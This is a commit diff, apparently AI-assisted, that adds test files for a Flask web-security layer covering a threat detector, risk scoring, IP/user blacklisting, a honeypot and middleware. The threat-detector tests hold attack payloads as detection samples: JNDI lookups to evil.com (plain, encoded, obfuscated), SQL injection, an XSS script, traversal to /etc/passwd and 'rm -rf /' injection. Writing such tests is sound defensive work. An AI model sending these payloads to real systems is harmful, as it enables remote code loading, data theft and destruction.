feat: 实现完整安全防护系统

Phase 1 - 威胁检测引擎:
- security/threat_detector.py: JNDI/SQL/XSS/路径遍历/命令注入检测
- security/constants.py: 威胁检测规则和评分常量
- 数据库表: threat_events, ip_risk_scores, user_risk_scores, ip_blacklist

Phase 2 - 风险评分与黑名单:
- security/risk_scorer.py: IP/用户风险评分引擎,支持分数衰减
- security/blacklist.py: 黑名单管理,自动封禁规则

Phase 3 - 响应策略:
- security/honeypot.py: 蜜罐响应生成器
- security/response_handler.py: 渐进式响应策略

Phase 4 - 集成:
- security/middleware.py: Flask安全中间件
- routes/admin_api/security.py: 管理后台安全仪表板API
- 36个测试用例全部通过

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
This commit is contained in:
2025-12-27 01:28:38 +08:00
parent e3b0c35da6
commit 46253337eb
24 changed files with 3219 additions and 4 deletions

View File

@@ -0,0 +1,249 @@
from __future__ import annotations
from datetime import timedelta
import pytest
from flask import Flask
import db_pool
from db.schema import ensure_schema
from db.utils import get_cst_now
from security.blacklist import BlacklistManager
from security.risk_scorer import RiskScorer
@pytest.fixture()
def _test_db(tmp_path):
db_file = tmp_path / "admin_security_api_test.db"
old_pool = getattr(db_pool, "_pool", None)
try:
if old_pool is not None:
try:
old_pool.close_all()
except Exception:
pass
db_pool._pool = None
db_pool.init_pool(str(db_file), pool_size=1)
with db_pool.get_db() as conn:
ensure_schema(conn)
yield db_file
finally:
try:
if getattr(db_pool, "_pool", None) is not None:
db_pool._pool.close_all()
except Exception:
pass
db_pool._pool = old_pool
def _make_app() -> Flask:
from routes.admin_api.security import security_bp
app = Flask(__name__)
app.config.update(SECRET_KEY="test-secret", TESTING=True)
app.register_blueprint(security_bp)
return app
def _login_admin(client) -> None:
with client.session_transaction() as sess:
sess["admin_id"] = 1
sess["admin_username"] = "admin"
def _insert_threat_event(*, threat_type: str, score: int, ip: str, user_id: int | None, created_at: str, payload: str):
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
INSERT INTO threat_events (threat_type, score, ip, user_id, request_path, value_preview, created_at)
VALUES (?, ?, ?, ?, ?, ?, ?)
""",
(threat_type, int(score), ip, user_id, "/api/test", payload, created_at),
)
conn.commit()
def test_dashboard_requires_admin(_test_db):
app = _make_app()
client = app.test_client()
resp = client.get("/api/admin/security/dashboard")
assert resp.status_code == 403
assert resp.get_json() == {"error": "需要管理员权限"}
def test_dashboard_counts_and_payload_truncation(_test_db):
app = _make_app()
client = app.test_client()
_login_admin(client)
now = get_cst_now()
within_24h = now.strftime("%Y-%m-%d %H:%M:%S")
within_24h_2 = (now - timedelta(hours=1)).strftime("%Y-%m-%d %H:%M:%S")
older = (now - timedelta(hours=25)).strftime("%Y-%m-%d %H:%M:%S")
long_payload = "x" * 300
_insert_threat_event(
threat_type="sql_injection",
score=90,
ip="1.2.3.4",
user_id=10,
created_at=within_24h,
payload=long_payload,
)
_insert_threat_event(
threat_type="xss",
score=70,
ip="2.3.4.5",
user_id=11,
created_at=within_24h_2,
payload="short",
)
_insert_threat_event(
threat_type="path_traversal",
score=60,
ip="9.9.9.9",
user_id=None,
created_at=older,
payload="old",
)
manager = BlacklistManager()
manager.ban_ip("8.8.8.8", reason="manual", duration_hours=1, permanent=False)
manager._ban_user_internal(123, reason="manual", duration_hours=1, permanent=False)
resp = client.get("/api/admin/security/dashboard")
assert resp.status_code == 200
data = resp.get_json()
assert data["threat_events_24h"] == 2
assert data["banned_ip_count"] == 1
assert data["banned_user_count"] == 1
recent = data["recent_threat_events"]
assert isinstance(recent, list)
assert len(recent) == 3
payload_preview = recent[0]["value_preview"]
assert isinstance(payload_preview, str)
assert len(payload_preview) <= 200
assert payload_preview.endswith("...")
def test_threats_pagination_and_filters(_test_db):
app = _make_app()
client = app.test_client()
_login_admin(client)
now = get_cst_now()
t1 = (now - timedelta(minutes=1)).strftime("%Y-%m-%d %H:%M:%S")
t2 = (now - timedelta(minutes=2)).strftime("%Y-%m-%d %H:%M:%S")
t3 = (now - timedelta(minutes=3)).strftime("%Y-%m-%d %H:%M:%S")
_insert_threat_event(threat_type="sql_injection", score=90, ip="1.1.1.1", user_id=1, created_at=t1, payload="a")
_insert_threat_event(threat_type="xss", score=70, ip="2.2.2.2", user_id=2, created_at=t2, payload="b")
_insert_threat_event(threat_type="nested_expression", score=80, ip="3.3.3.3", user_id=3, created_at=t3, payload="c")
resp = client.get("/api/admin/security/threats?page=1&per_page=2")
assert resp.status_code == 200
data = resp.get_json()
assert data["total"] == 3
assert len(data["items"]) == 2
resp2 = client.get("/api/admin/security/threats?page=2&per_page=2")
assert resp2.status_code == 200
data2 = resp2.get_json()
assert data2["total"] == 3
assert len(data2["items"]) == 1
resp3 = client.get("/api/admin/security/threats?event_type=sql_injection")
assert resp3.status_code == 200
data3 = resp3.get_json()
assert data3["total"] == 1
assert data3["items"][0]["threat_type"] == "sql_injection"
resp4 = client.get("/api/admin/security/threats?severity=high")
assert resp4.status_code == 200
data4 = resp4.get_json()
assert data4["total"] == 2
assert {item["threat_type"] for item in data4["items"]} == {"sql_injection", "nested_expression"}
def test_ban_and_unban_ip(_test_db):
app = _make_app()
client = app.test_client()
_login_admin(client)
resp = client.post("/api/admin/security/ban-ip", json={"ip": "7.7.7.7", "reason": "test", "duration_hours": 1})
assert resp.status_code == 200
assert resp.get_json()["success"] is True
list_resp = client.get("/api/admin/security/banned-ips")
assert list_resp.status_code == 200
payload = list_resp.get_json()
assert payload["count"] == 1
assert payload["items"][0]["ip"] == "7.7.7.7"
resp2 = client.post("/api/admin/security/unban-ip", json={"ip": "7.7.7.7"})
assert resp2.status_code == 200
assert resp2.get_json()["success"] is True
list_resp2 = client.get("/api/admin/security/banned-ips")
assert list_resp2.status_code == 200
assert list_resp2.get_json()["count"] == 0
def test_risk_endpoints_and_cleanup(_test_db):
app = _make_app()
client = app.test_client()
_login_admin(client)
scorer = RiskScorer(auto_ban_enabled=False)
scorer.record_threat("4.4.4.4", 44, threat_type="xss", score=20, request_path="/", payload="<script>")
ip_resp = client.get("/api/admin/security/ip-risk/4.4.4.4")
assert ip_resp.status_code == 200
ip_data = ip_resp.get_json()
assert ip_data["risk_score"] == 20
assert len(ip_data["threat_history"]) >= 1
user_resp = client.get("/api/admin/security/user-risk/44")
assert user_resp.status_code == 200
user_data = user_resp.get_json()
assert user_data["risk_score"] == 20
assert len(user_data["threat_history"]) >= 1
# Prepare decaying scores and expired ban
old_ts = (get_cst_now() - timedelta(hours=2)).strftime("%Y-%m-%d %H:%M:%S")
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
INSERT INTO ip_risk_scores (ip, risk_score, last_seen, created_at, updated_at)
VALUES (?, 100, ?, ?, ?)
""",
("5.5.5.5", old_ts, old_ts, old_ts),
)
cursor.execute(
"""
INSERT INTO ip_blacklist (ip, reason, is_active, added_at, expires_at)
VALUES (?, ?, 1, ?, ?)
""",
("6.6.6.6", "expired", old_ts, old_ts),
)
conn.commit()
manager = BlacklistManager()
assert manager.is_ip_banned("6.6.6.6") is False # expired already
cleanup_resp = client.post("/api/admin/security/cleanup", json={})
assert cleanup_resp.status_code == 200
assert cleanup_resp.get_json()["success"] is True
# Score decayed by cleanup
assert RiskScorer().get_ip_score("5.5.5.5") == 81

View File

@@ -0,0 +1,63 @@
from __future__ import annotations
import uuid
from security import HoneypotResponder
def test_should_use_honeypot_threshold():
responder = HoneypotResponder()
assert responder.should_use_honeypot(79) is False
assert responder.should_use_honeypot(80) is True
assert responder.should_use_honeypot(100) is True
def test_generate_fake_response_email():
responder = HoneypotResponder()
resp = responder.generate_fake_response("/api/forgot-password")
assert resp["success"] is True
assert resp["message"] == "邮件已发送"
def test_generate_fake_response_register_contains_fake_uuid():
responder = HoneypotResponder()
resp = responder.generate_fake_response("/api/register")
assert resp["success"] is True
assert "user_id" in resp
uuid.UUID(resp["user_id"])
def test_generate_fake_response_login():
responder = HoneypotResponder()
resp = responder.generate_fake_response("/api/login")
assert resp == {"success": True}
def test_generate_fake_response_generic():
responder = HoneypotResponder()
resp = responder.generate_fake_response("/api/tasks/run")
assert resp["success"] is True
assert resp["message"] == "操作成功"
def test_delay_response_ranges():
responder = HoneypotResponder()
assert responder.delay_response(0) == 0
assert responder.delay_response(20) == 0
d = responder.delay_response(21)
assert 0.5 <= d <= 1.0
d = responder.delay_response(50)
assert 0.5 <= d <= 1.0
d = responder.delay_response(51)
assert 1.0 <= d <= 3.0
d = responder.delay_response(80)
assert 1.0 <= d <= 3.0
d = responder.delay_response(81)
assert 3.0 <= d <= 8.0
d = responder.delay_response(100)
assert 3.0 <= d <= 8.0

View File

@@ -0,0 +1,72 @@
from __future__ import annotations
import random
import security.response_handler as rh
from security import ResponseAction, ResponseHandler, ResponseStrategy
def test_get_strategy_banned_blocks():
handler = ResponseHandler(rng=random.Random(0))
strategy = handler.get_strategy(10, is_banned=True)
assert strategy.action == ResponseAction.BLOCK
assert strategy.delay_seconds == 0
assert strategy.message == "访问被拒绝"
def test_get_strategy_allow_levels():
handler = ResponseHandler(rng=random.Random(0))
s = handler.get_strategy(0)
assert s.action == ResponseAction.ALLOW
assert s.delay_seconds == 0
assert s.captcha_level == 1
s = handler.get_strategy(21)
assert s.action == ResponseAction.ALLOW
assert s.delay_seconds == 0
assert s.captcha_level == 2
def test_get_strategy_delay_ranges():
handler = ResponseHandler(rng=random.Random(0))
s = handler.get_strategy(41)
assert s.action == ResponseAction.DELAY
assert 1.0 <= s.delay_seconds <= 2.0
s = handler.get_strategy(61)
assert s.action == ResponseAction.DELAY
assert 2.0 <= s.delay_seconds <= 5.0
s = handler.get_strategy(81)
assert s.action == ResponseAction.HONEYPOT
assert 3.0 <= s.delay_seconds <= 8.0
def test_apply_delay_uses_time_sleep(monkeypatch):
handler = ResponseHandler(rng=random.Random(0))
strategy = ResponseStrategy(action=ResponseAction.DELAY, delay_seconds=1.234)
called = {"count": 0, "seconds": None}
def fake_sleep(seconds):
called["count"] += 1
called["seconds"] = seconds
monkeypatch.setattr(rh.time, "sleep", fake_sleep)
handler.apply_delay(strategy)
assert called["count"] == 1
assert called["seconds"] == 1.234
def test_get_captcha_requirement():
handler = ResponseHandler(rng=random.Random(0))
req = handler.get_captcha_requirement(ResponseStrategy(action=ResponseAction.ALLOW, captcha_level=2))
assert req == {"required": True, "level": 2}
req = handler.get_captcha_requirement(ResponseStrategy(action=ResponseAction.BLOCK, captcha_level=2))
assert req == {"required": False, "level": 2}

179
tests/test_risk_scorer.py Normal file
View File

@@ -0,0 +1,179 @@
from __future__ import annotations
from datetime import timedelta
import pytest
import db_pool
from db.schema import ensure_schema
from db.utils import get_cst_now
from security import constants as C
from security.blacklist import BlacklistManager
from security.risk_scorer import RiskScorer
@pytest.fixture()
def _test_db(tmp_path):
db_file = tmp_path / "risk_scorer_test.db"
old_pool = getattr(db_pool, "_pool", None)
try:
if old_pool is not None:
try:
old_pool.close_all()
except Exception:
pass
db_pool._pool = None
db_pool.init_pool(str(db_file), pool_size=1)
with db_pool.get_db() as conn:
ensure_schema(conn)
yield db_file
finally:
try:
if getattr(db_pool, "_pool", None) is not None:
db_pool._pool.close_all()
except Exception:
pass
db_pool._pool = old_pool
def test_record_threat_updates_scores_and_combined(_test_db):
manager = BlacklistManager()
scorer = RiskScorer(blacklist_manager=manager)
ip = "1.2.3.4"
user_id = 123
assert scorer.get_ip_score(ip) == 0
assert scorer.get_user_score(user_id) == 0
assert scorer.get_combined_score(ip, user_id) == 0
scorer.record_threat(ip, user_id, threat_type="sql_injection", score=30, request_path="/login", payload="x")
assert scorer.get_ip_score(ip) == 30
assert scorer.get_user_score(user_id) == 30
assert scorer.get_combined_score(ip, user_id) == 30
scorer.record_threat(ip, user_id, threat_type="sql_injection", score=80, request_path="/login", payload="y")
assert scorer.get_ip_score(ip) == 100
assert scorer.get_user_score(user_id) == 100
assert scorer.get_combined_score(ip, user_id) == 100
def test_auto_ban_on_score_100(_test_db):
manager = BlacklistManager()
scorer = RiskScorer(blacklist_manager=manager)
ip = "5.6.7.8"
user_id = 456
scorer.record_threat(ip, user_id, threat_type="sql_injection", score=100, request_path="/api", payload="boom")
assert manager.is_ip_banned(ip) is True
assert manager.is_user_banned(user_id) is True
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute("SELECT expires_at FROM ip_blacklist WHERE ip = ?", (ip,))
row = cursor.fetchone()
assert row is not None
assert row["expires_at"] is not None
cursor.execute("SELECT expires_at FROM user_blacklist WHERE user_id = ?", (user_id,))
row = cursor.fetchone()
assert row is not None
assert row["expires_at"] is not None
def test_jndi_injection_permanent_ban(_test_db):
manager = BlacklistManager()
scorer = RiskScorer(blacklist_manager=manager)
ip = "9.9.9.9"
user_id = 999
scorer.record_threat(ip, user_id, threat_type=C.THREAT_TYPE_JNDI_INJECTION, score=100, request_path="/", payload="${jndi:ldap://x}")
assert manager.is_ip_banned(ip) is True
assert manager.is_user_banned(user_id) is True
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute("SELECT expires_at FROM ip_blacklist WHERE ip = ?", (ip,))
row = cursor.fetchone()
assert row is not None
assert row["expires_at"] is None
cursor.execute("SELECT expires_at FROM user_blacklist WHERE user_id = ?", (user_id,))
row = cursor.fetchone()
assert row is not None
assert row["expires_at"] is None
def test_high_risk_three_times_permanent_ban(_test_db):
manager = BlacklistManager()
scorer = RiskScorer(blacklist_manager=manager, high_risk_threshold=80, high_risk_permanent_ban_count=3)
ip = "10.0.0.1"
user_id = 1
scorer.record_threat(ip, user_id, threat_type="nested_expression", score=80, request_path="/", payload="a")
scorer.record_threat(ip, user_id, threat_type="nested_expression", score=80, request_path="/", payload="b")
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute("SELECT expires_at FROM ip_blacklist WHERE ip = ?", (ip,))
row = cursor.fetchone()
assert row is not None
assert row["expires_at"] is not None # score hits 100 => temporary ban first
scorer.record_threat(ip, user_id, threat_type="nested_expression", score=80, request_path="/", payload="c")
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute("SELECT expires_at FROM ip_blacklist WHERE ip = ?", (ip,))
row = cursor.fetchone()
assert row is not None
assert row["expires_at"] is None # 3 high-risk threats => permanent
cursor.execute("SELECT expires_at FROM user_blacklist WHERE user_id = ?", (user_id,))
row = cursor.fetchone()
assert row is not None
assert row["expires_at"] is None
def test_decay_scores_hourly_10_percent(_test_db):
manager = BlacklistManager()
scorer = RiskScorer(blacklist_manager=manager)
ip = "3.3.3.3"
user_id = 11
old_ts = (get_cst_now() - timedelta(hours=2)).strftime("%Y-%m-%d %H:%M:%S")
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
INSERT INTO ip_risk_scores (ip, risk_score, last_seen, created_at, updated_at)
VALUES (?, 100, ?, ?, ?)
""",
(ip, old_ts, old_ts, old_ts),
)
cursor.execute(
"""
INSERT INTO user_risk_scores (user_id, risk_score, last_seen, created_at, updated_at)
VALUES (?, 100, ?, ?, ?)
""",
(user_id, old_ts, old_ts, old_ts),
)
conn.commit()
scorer.decay_scores()
assert scorer.get_ip_score(ip) == 81
assert scorer.get_user_score(user_id) == 81

View File

@@ -0,0 +1,155 @@
from __future__ import annotations
import pytest
from flask import Flask, g, jsonify
from flask_login import LoginManager
import db_pool
from db.schema import ensure_schema
from security import init_security_middleware
@pytest.fixture()
def _test_db(tmp_path):
db_file = tmp_path / "security_middleware_test.db"
old_pool = getattr(db_pool, "_pool", None)
try:
if old_pool is not None:
try:
old_pool.close_all()
except Exception:
pass
db_pool._pool = None
db_pool.init_pool(str(db_file), pool_size=1)
with db_pool.get_db() as conn:
ensure_schema(conn)
yield db_file
finally:
try:
if getattr(db_pool, "_pool", None) is not None:
db_pool._pool.close_all()
except Exception:
pass
db_pool._pool = old_pool
def _make_app(monkeypatch, _test_db, *, security_enabled: bool = True, honeypot_enabled: bool = True) -> Flask:
import security.middleware as sm
import security.response_handler as rh
# 避免测试因风控延迟而变慢
monkeypatch.setattr(rh.time, "sleep", lambda _seconds: None)
# 每个测试用例保持 handler/honeypot 的懒加载状态
sm.handler = None
sm.honeypot = None
app = Flask(__name__)
app.config.update(
SECRET_KEY="test-secret",
TESTING=True,
SECURITY_ENABLED=bool(security_enabled),
HONEYPOT_ENABLED=bool(honeypot_enabled),
SECURITY_LOG_LEVEL="CRITICAL", # 降低测试日志噪音
)
login_manager = LoginManager()
login_manager.init_app(app)
@login_manager.user_loader
def _load_user(_user_id: str):
return None
init_security_middleware(app)
return app
def _client_get(app: Flask, path: str, *, ip: str = "1.2.3.4"):
return app.test_client().get(path, environ_overrides={"REMOTE_ADDR": ip})
def test_middleware_blocks_banned_ip(_test_db, monkeypatch):
app = _make_app(monkeypatch, _test_db)
@app.get("/api/ping")
def _ping():
return jsonify({"ok": True})
import security.middleware as sm
sm.blacklist.ban_ip("1.2.3.4", reason="test", duration_hours=1, permanent=False)
resp = _client_get(app, "/api/ping", ip="1.2.3.4")
assert resp.status_code == 503
assert resp.get_json() == {"error": "服务暂时繁忙,请稍后重试"}
def test_middleware_skips_static_requests(_test_db, monkeypatch):
app = _make_app(monkeypatch, _test_db)
@app.get("/static/test")
def _static_test():
return "ok"
import security.middleware as sm
sm.blacklist.ban_ip("1.2.3.4", reason="test", duration_hours=1, permanent=False)
resp = _client_get(app, "/static/test", ip="1.2.3.4")
assert resp.status_code == 200
assert resp.get_data(as_text=True) == "ok"
def test_middleware_honeypot_short_circuits_side_effects(_test_db, monkeypatch):
app = _make_app(monkeypatch, _test_db, honeypot_enabled=True)
called = {"count": 0}
@app.get("/api/side-effect")
def _side_effect():
called["count"] += 1
return jsonify({"real": True})
resp = _client_get(app, "/api/side-effect?q=${${a}}", ip="9.9.9.9")
assert resp.status_code == 200
payload = resp.get_json()
assert isinstance(payload, dict)
assert payload.get("success") is True
assert called["count"] == 0
def test_middleware_fails_open_on_internal_errors(_test_db, monkeypatch):
app = _make_app(monkeypatch, _test_db)
@app.get("/api/ok")
def _ok():
return jsonify({"ok": True, "risk_score": getattr(g, "risk_score", None)})
import security.middleware as sm
def boom(*_args, **_kwargs):
raise RuntimeError("boom")
monkeypatch.setattr(sm.blacklist, "is_ip_banned", boom)
monkeypatch.setattr(sm.detector, "scan_input", boom)
resp = _client_get(app, "/api/ok", ip="2.2.2.2")
assert resp.status_code == 200
assert resp.get_json()["ok"] is True
def test_middleware_sets_request_context_fields(_test_db, monkeypatch):
app = _make_app(monkeypatch, _test_db)
@app.get("/api/context")
def _context():
strategy = getattr(g, "response_strategy", None)
action = getattr(getattr(strategy, "action", None), "value", None)
return jsonify({"risk_score": getattr(g, "risk_score", None), "action": action})
resp = _client_get(app, "/api/context", ip="8.8.8.8")
assert resp.status_code == 200
assert resp.get_json() == {"risk_score": 0, "action": "allow"}

View File

@@ -0,0 +1,69 @@
from flask import Flask, request
from security import constants as C
from security.threat_detector import ThreatDetector
def test_jndi_direct_scores_100():
detector = ThreatDetector()
results = detector.scan_input("${jndi:ldap://evil.com/a}", "q")
assert any(r.threat_type == C.THREAT_TYPE_JNDI_INJECTION and r.score == 100 for r in results)
def test_jndi_encoded_scores_100():
detector = ThreatDetector()
results = detector.scan_input("%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fa%7D", "q")
assert any(r.threat_type == C.THREAT_TYPE_JNDI_INJECTION and r.score == 100 for r in results)
def test_jndi_obfuscated_scores_100():
detector = ThreatDetector()
payload = "${${::-j}${::-n}${::-d}${::-i}:rmi://evil.com/a}"
results = detector.scan_input(payload, "q")
assert any(r.threat_type == C.THREAT_TYPE_JNDI_INJECTION and r.score == 100 for r in results)
def test_nested_expression_scores_80():
detector = ThreatDetector()
results = detector.scan_input("${${env:USER}}", "q")
assert any(r.threat_type == C.THREAT_TYPE_NESTED_EXPRESSION and r.score == 80 for r in results)
def test_sqli_union_select_scores_90():
detector = ThreatDetector()
results = detector.scan_input("UNION SELECT password FROM users", "q")
assert any(r.threat_type == C.THREAT_TYPE_SQL_INJECTION and r.score == 90 for r in results)
def test_sqli_or_1_eq_1_scores_90():
detector = ThreatDetector()
results = detector.scan_input("a' OR 1=1 --", "q")
assert any(r.threat_type == C.THREAT_TYPE_SQL_INJECTION and r.score == 90 for r in results)
def test_xss_scores_70():
detector = ThreatDetector()
results = detector.scan_input("<script>alert(1)</script>", "q")
assert any(r.threat_type == C.THREAT_TYPE_XSS and r.score == 70 for r in results)
def test_path_traversal_scores_60():
detector = ThreatDetector()
results = detector.scan_input("../../etc/passwd", "path")
assert any(r.threat_type == C.THREAT_TYPE_PATH_TRAVERSAL and r.score == 60 for r in results)
def test_command_injection_scores_85():
detector = ThreatDetector()
results = detector.scan_input("test; rm -rf /", "cmd")
assert any(r.threat_type == C.THREAT_TYPE_COMMAND_INJECTION and r.score == 85 for r in results)
def test_scan_request_picks_up_args():
app = Flask(__name__)
detector = ThreatDetector()
with app.test_request_context("/?q=${jndi:ldap://evil.com/a}"):
results = detector.scan_request(request)
assert any(r.field_name == "args.q" and r.threat_type == C.THREAT_TYPE_JNDI_INJECTION and r.score == 100 for r in results)